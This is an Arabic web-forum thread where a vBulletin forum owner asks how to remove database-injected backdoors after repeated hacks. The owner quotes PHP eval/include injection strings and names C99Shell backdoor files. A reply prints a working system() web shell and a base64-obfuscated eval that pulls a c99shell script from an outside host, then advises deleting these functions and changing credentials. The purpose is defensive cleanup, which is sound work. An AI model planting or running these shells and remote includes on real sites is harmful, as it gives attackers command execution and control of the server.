النتائج 1 إلى 5 من 5

الموضوع: قاعدة بيانات المنتدى تحتوي أكواد ارسال للهكـر

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Oct 2005
    المشاركات
    68

    Exclamation قاعدة بيانات المنتدى تحتوي أكواد ارسال للهكـر



    السـلام عليكم ورحمـة الله وبركاتـه

    المنتـدى عندي اختـرق أكثـر من مرة والهكـر يقول
    لو أسوي ايش ما اسـوي راح يخترقـه لأنه حاط اكواد ارسال
    بقاعدة البيانات حتى لو غيرت الكونفج اسمه ومكانه وشفرته بالزند
    راح يخترقـه وحتـى لو حطيتهـا على سيرفر ثاني على كلامـه ..
    وحتى الغي الأكواد يقول لازم ارجع باك أب قبل 3 شهـور
    وصعبـة اخسـر شغل 3 شهـور وأصـلاً ماعندي باك أب قبل 3 شهـور

    وش الحـل ؟
    كيف اشيل هالأكواد واتخلص منهـا حتى لا ترسل له المعلومات
    على حسب ماقـال ..







  2. #2
    عضو نشيط
    تاريخ التسجيل
    May 2007
    المشاركات
    181


    الفكره في جزء اكيد في منتديات الفيبلتون
    يمر على داله تنفيذ اكواد php
    انا لا اعرف للفيبلتون
    بس هي دي فكرتها
    اخواننا هنا في المنتدى اليعرف اين يتم تنفيذ ال php بعد تسجيلها في قاعده بيانات يدلوك





    __________________
    يتم قبول الان استقبال اي طلبات التطبيقات
    على اي نوع من المنصات الاتيه للجوال
    ( اندرويد -- ايفون ) تابعنا
    ( أعمالنا - اتصل بنا )
    يمكنك الان عمل تطبيق خاص لمنتداك

  3. #3
    عضو نشيط
    تاريخ التسجيل
    Oct 2005
    المشاركات
    68


    تسـلم عـزيزي وبارك الله فيـك

    وبإنتظـار أحد الإخـوة يفيـدني لأني ماراح
    اقـدر ارجـع المنتـدى وكـل شوي الهكـر راح يطيـح قاعدة البيانات
    ويـركب وحدة ثانيـة جديدة ، وعملت كل انواع الحمايـة
    بس مافيـه فائـدة الرجـال يقـول لو ايش ماتسـوي
    للكـونفج راح افكـه وأوصل للقـاعدة لأنهـا مصابـه بأكواد
    الإرسـال المتصـلة !






  4. #4
    عضو نشيط
    تاريخ التسجيل
    Oct 2005
    المشاركات
    68


    الرجـال على كلامـه انه حاقن قاعـدة البيانات وبحثت بأكواد الحقن
    اللي تستخـدم للإستثمـار والإستغـلال

    وهم كود :

    كود PHP:
    ".print include($HTTP_GET_VARS[cmd])." 
    وكـود آخر يستخدم للحقـن والعـادة هالأكواد تحقـن بجـدول الأسئـلة الشائعـة
    أو جدول قليل استخدامـه بالملف أو ما أحد يستخدمـة مثل جدول الكلنـدر والأسئـلة


    كود PHP:
    {${eval($_GET[vb])}} 
    هـذه الأكواد اللي اعرفهـا تحقـن ومن خلالهـا يتم
    الإتصـال بالقاعـدة عن طـريق ملف شـل ..

    وبالمصـادفة اكتشف اربـع ملفات غـريبة على المسـار
    vb/upload/1

    كنت مـركب هاك المنـافع لرفع الصـور والملفات
    بس حذفتـه بعـدين ..

    المهم الملفات موجودة على الـرابط: رفعتهـا على تشـوفوهـا ممكن تفيد بمعـرفة وين الحقـن
    1.rar - 0.07MB

    ..
    وأشبـه ماتكون ملفات شـل لأنه صاد عنـدي الكاسبـر
    سكـاي ملف med1a.php على إنه :
    Backdoor.PHP.C99Shell.d

    وهم ملف بعـد على المسـار
    vb/upload/2/3.php

    من نـوع
    Backdoor.PHP.C99Shell.z
    2.rar - 0.03MB

    اتمنـى من الخبـراء مسـاعدتي بمعـرفة وين الحقـن
    والحيـن القاعـدة عندي موجودة بس شايـل اتصالهـا






  5. #5
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2003
    المشاركات
    366


    حاول ترفع الملف من موقع اخر

    عموما التلغيم يعتمد على بعض الدوال المهمه منها
    eval
    system
    include

    انت وضعت امثله للحقن بواسطة الدوال eval و include

    وهذا مثال للتوضيح باستخدام system

    كود PHP:
    <?php
    if(empty($_GET['shell'])){
    } else {
    $m=$_GET['shell'];
    echo 
    system($m) ;
    }
    ?>
    والبعض الاخر يقوم بتشفير الكود باستخدام اداة التشفير مثل Base64 او غيرها من برامج التشفير

    مثال

    كود PHP:
    <?php
    if(empty($_GET['shell'])){
    } else {

    $m=$_GET['shell'];
    eval(
    base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL2M5OXNoZWxsLnR4dD8iKTs='));
    }
    ?>
    كود:
    include("http://rst.void.ru/download/c99shell.txt?");
    ابحث في التمبلت عن الدوال وقم بحذفها + تغيير يوزر وباسورد القاعده










ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض